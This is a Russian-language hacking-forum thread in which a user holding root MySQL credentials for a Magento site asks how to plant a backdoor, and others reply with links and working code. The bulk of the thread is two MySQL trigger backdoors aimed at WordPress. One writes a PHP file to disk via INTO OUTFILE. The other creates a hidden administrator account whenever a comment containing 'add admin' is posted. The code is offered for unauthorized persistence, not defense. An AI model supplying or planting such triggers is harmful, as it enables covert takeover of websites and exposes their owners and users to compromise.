Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Загрузка бекдора в базу Mysql, как? (https://forum.antichat.xyz/showthread.php?t=447721)

PoliGroS 05.02.2017 19:26

Есть сайт магенто, в директории очень много файлов закритих, можно даже сказать что все. Ну не суть. Есть пароль к mysql рутовский, как оставить бекдор? Большое спасибо за ответы.

crlf 05.02.2017 20:03

Либы

https://rdot.org/forum/showthread.php?t=2051

Тригеры

https://raz0r.name/mysli/backdoor-in-trigger/

PoliGroS 05.02.2017 21:17

Вот под wp ничего не получается у людей, хз что по магенто. ну попробую скажу.

Цитата:

Сообщение от None
DELIMITER //
CREATE TRIGGER backdoor AFTER UPDATE ON wp_users
FOR EACH ROW label:BEGIN
IF (SELECT user_pass FROM wp_users WHERE ID=1)=’$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’ THEN
SELECT » INTO OUTFILE ‘site/smile.php’;
ELSE
LEAVE label;
END IF;
END;
//
DELIMITER ;
я бы подумал что руки кривые, но и у ребят с форума тоже нечего не получилось
DELIMITER //
CREATE TRIGGER `INSERT` BEFORE INSERT ON `wp_comments`
FOR EACH ROW BEGIN
IF NEW.comment_content = ‘add admin’ THEN
INSERT INTO `wp_users` ( `ID` , `user_login` , `user_pass` ) VALUES
(‘31337’, ‘root’, ‘$P$B9wcvAmi3JvyqJ5991Qif8LRgzSAfc.’);
INSERT INTO `wp_usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES
(‘31337’, ‘wp_capabilities’, ‘a:1:{s:13:»administrator»;s:1:»1″;}’),
(‘31337’, ‘admin_color’, ‘fresh’),
(‘31337’, ‘comment_shortcuts’, ‘false’),
(‘31337’, ‘rich_editing’, ‘true’),
(‘31337’, ‘nickname’, ‘root’),
(‘31337’, ‘first_name’, ‘
drtro.public@gmail.com
’),
(‘31337’, ‘wp_user_level’, ’10’);
END IF;
END
//
DELIMITER ;

hnnps://xakep.ru/2011/11/22/57856/ - вот тут уже поинтересней.


Время: 23:38